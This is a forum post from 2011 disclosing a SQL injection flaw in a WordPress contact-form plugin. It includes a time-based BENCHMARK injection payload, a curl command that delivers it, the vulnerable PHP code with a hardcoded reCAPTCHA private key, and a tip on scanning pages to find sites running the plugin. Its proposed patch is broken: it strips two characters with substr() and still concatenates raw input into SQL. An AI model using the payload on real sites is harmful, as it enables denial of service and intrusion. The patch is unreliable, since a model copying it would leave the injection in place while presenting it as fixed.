WordPress Contact Form plugin <= 2.7.5 SQL Injection Vulnerability

No replies
skraps
Offline
Neophyte
Joined: 2011/10/12

Ok I was bored today and thought I'd try my hand at finding a SQL injection problem in wordpress some wordpress plugins. Lo and behold I found one. It wasn't that hard and it really doesn't do much. You could perform a DOS attack with this and that would be lame and that's why they need to fix it. Then again if your host has proper mysqld kill scripts set into place, it's only a small annoyance.

You can find the plugin page right here http://wordpress.org/extend/plugins/contact-form-wordpress/

It's actually one of the more popular plugins people use for some reason. So I guess if you wrote a script to search for id="easyform" in the html output you could find alot of blogs using this its only been downloaded 1,666 times so there has to be at least 600 blogs out there using it.

Remember that WOW upside down spells MOM. Keep that in mind for future reference. OFYLTA

# Exploit Title: WordPress Contact Form plugin <= 2.7.5 SQL Injection Vulnerability
# Date: 2011-10-13
# Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
# Software Link: <a href="http://downloads.wordpress.org/plugin/contact-form-wordpress.zip<br />
#" title="http://downloads.wordpress.org/plugin/contact-form-wordpress.zip<br />
#">http://downloads.wordpress.org/plugin/contact-form-wordpress.zip<br />
#</a> Version: 2.7.5 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/contact-form-wordpress/easy-form.class.php
wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)
 
e.g.
curl --data "wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" <a href="http://127.0.0.1/wordpress/?p=1<br />
" title="http://127.0.0.1/wordpress/?p=1<br />
">http://127.0.0.1/wordpress/?p=1<br />
</a>
---------------
Vulnerable code
---------------
Line 49:
    public function the_content($content) {
        global $wpdb;
        global $table_name;
        global $settings_table_name;

        $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';

        if ($_POST['wpcf_easyform_submitted'] == 1) {

            $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);

---------------
Patch
---------------

*** ./easy-form.class.php.orig  2011-10-13 19:53:05.674800956 -0400
--- ./easy-form.class.php       2011-10-13 19:51:21.442799615 -0400
***************
*** 54,61 ****
          $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
         
          if ($_POST['wpcf_easyform_submitted'] == 1) {
!        
!             $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);
             
              $continue = true;
             
--- 54,63 ----
          $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
         
          if ($_POST['wpcf_easyform_submitted'] == 1) {
!                   $wpcf_easyform_formid=$_POST['wpcf_easyform_formid'];
!             $wpcf_easyform_formid=substr($wpcf_easyform_formid,2);
!            
!       $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$wpcf_easyform_formid);
             
              $continue = true;
             
***************
*** 71,80 ****
              if ($continue) {
             
                  //loop through the fields of this form (read from DB) and build the message here
!                 $form_fields = $wpdb->get_results("
                                SELECT *
                                FROM $settings_table_name
!                               WHERE form_id = ".$_POST['wpcf_easyform_formid']."
                                ORDER BY position
                        ");
                       
--- 73,82 ----
              if ($continue) {
             
                  //loop through the fields of this form (read from DB) and build the message here
!               $form_fields = $wpdb->get_results("
                                SELECT *
                                FROM $settings_table_name
!                               WHERE form_id = ".$wpcf_easyform_formid."
                                ORDER BY position
                        ");